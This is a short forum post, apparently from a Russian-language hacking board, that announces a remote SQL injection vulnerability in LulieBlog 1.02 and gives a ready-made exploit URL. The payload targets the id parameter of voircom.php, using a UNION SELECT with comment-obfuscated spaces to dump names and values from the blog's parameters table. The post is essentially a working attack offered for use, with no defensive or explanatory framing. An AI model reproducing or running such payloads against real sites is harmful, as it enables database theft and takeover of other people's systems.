23.01.2008, 19:14
|
|
Banned
Регистрация: 19.12.2007
Сообщений: 924
С нами:
9681386
Репутация:
2145
|
|
LulieBlog 1.02 (voircom.php id) Remote SQL Injection Vulnerability
Vendor: http://sourceforge.net/project/platformdownload.php?group_id=204083
Remote SQL Injection
Vulnerable: LulieBlog Version 1.02
Exploit:
Код:
http://Sitename/voircom.php?id=-1%27union/**/select/**/0,concat(nom_parametre,0x3a,0x3a,valeur_parametre),2,3,4,5/**/from/**/lulieblog_parametres/*
|
|
|